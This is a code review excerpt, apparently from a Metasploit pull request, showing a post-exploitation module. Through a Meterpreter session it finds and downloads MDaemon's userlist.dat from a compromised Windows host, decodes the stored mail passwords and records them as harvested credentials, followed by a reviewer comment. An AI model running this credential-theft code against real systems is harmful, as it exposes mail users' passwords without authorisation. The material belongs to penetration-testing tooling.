modules/post/windows/gather/credentials/mdaemon_cred_collector.rb

```diff
@@ -0,0 +1,321 @@
+    tmp_filename = (0...12).map { (65 + rand(26)).chr }.join
+    begin
+      locations.each do |location|
+        vprint_status("Checking for Userlist in MDaemons directory at: #{location}")
+        begin
+          session.fs.dir.foreach("#{location}") do |fdir|
+            ['userlist.dat'].each do |datfile|
+              if fdir.downcase == datfile.downcase
+                filepath = location + '\\' + datfile
+                print_good("Configuration file found: #{filepath}")
+                print_good("Found MDaemons on #{sysinfo['Computer']} via session ID: #{session.sid}")
+                vprint_status("Downloading UserList.dat file to tmp file: #{tmp_filename}")
+                session.fs.file.download_file(tmp_filename, filepath)
+                # userdat = session.fs.file.open(filepath).read.to_s.split(/\n/)
+                return tmp_filename
+              end
+            end
+          end
+        rescue Rex::Post::Meterpreter::RequestError => e
+          vprint_error(e.message)
+        end
+      end
+    rescue ::Exception => e
+      print_error(e.to_s)
+      return
+    end
+
+    return nil
+  end
+
+  def parse_userlist(data)
+    # creds  = ["['domain','mailbox','full_name','mail_dir','password']"]
+    creds = []
+    pop3 = []
+    imap = []
+    users = 0
+    passwords = 0
+    file = File.open(data)
+    file.each do |line|
+      domain = line.slice(0..44).strip!
+      mailbox = line.slice(45..74).strip!
+      full_name = line.slice(75..104).strip!
+      mail_dir = line.slice(105..194).strip!
+      raw_password = line.slice(195..210)
+      password = crack_password(raw_password)
+      access= line.slice(217)
+      users     += 1
+      passwords += 1
+      if access == 'Y' # IMAP & POP3
+        pop3 << [domain, mailbox, full_name, mail_dir, password]
+        imap << [domain, mailbox, full_name, mail_dir, password]
+      elsif access == 'P' # POP3
+        pop3 << [domain, mailbox, full_name, mail_dir, password]
+      elsif access == 'I' # IMAP
+        imap << [domain, mailbox, full_name, mail_dir, password]
+      end
+      # Saves all the passwords
+      creds << [domain, mailbox, full_name, mail_dir, password]
+    end
+    vprint_status('Collected the following credentials:')
+    vprint_status("    Usernames: #{users}")
+    vprint_status("    Passwords: #{passwords}")
+    vprint_status("Deleting tmp file: #{data}")
+    del_cmd = 'rm '
+    del_cmd << data
+    system(del_cmd)
+    return creds, imap, pop3
+  end
+
+  def report_cred(creds)
+    # Build service information
+    service_data = {
+      # address: session.session_host, # Gives internal IP
+      address: session.tunnel_peer.partition(':')[0], # Gives public IP
+      port: 25,
+      service_name: 'smtp',
+      protocol: 'tcp',
+    }
+    # Iterate through credentials
+    creds.each do |cred|
+      # Build credential information
+      credential_data = {
+        origin_type: :service,
```

Comment:
to use service the module full name needs to match [MODULE_FULL_NAME_REGEXP](https://github.com/rapid7/metasploit-credential/blob/master/app/models/metasploit/credential/origin/service.rb#L14)
but that constraint isn't on session.